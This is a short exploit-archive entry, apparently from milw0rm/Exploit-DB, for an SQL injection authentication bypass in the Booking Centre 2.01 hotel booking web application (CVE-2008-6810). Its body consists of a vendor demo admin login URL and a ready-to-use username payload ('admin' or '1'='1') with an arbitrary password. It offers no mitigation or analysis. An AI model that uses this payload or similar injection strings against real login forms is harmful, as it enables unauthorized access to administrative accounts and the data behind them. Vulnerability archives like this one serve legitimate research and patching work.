Booking Centre 2.01 - Authentication Bypass
Author: MrDoug
type: webapps
platform: php
port:
date_added: 2008-11-27
date_updated: 2017-01-03
verified: 1
codes: OSVDB-54619;CVE-2008-6810
tags:
aliases:
screenshot_url:
application_url:
Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability
--------------------------------------------------------------
Author: MrDoug
E-mail: mrdoug13[at]gmail[dot]com
--------------------------------------------------------------
Exploit: http://demo.hotelsadmin.com/admin/index.php
Username == admin' or '1'='1
password == (whatever)
--------------------------------------------------------------
Greetz to Slappywag
--------------------------------------------------------------
# milw0rm.com [2008-11-28]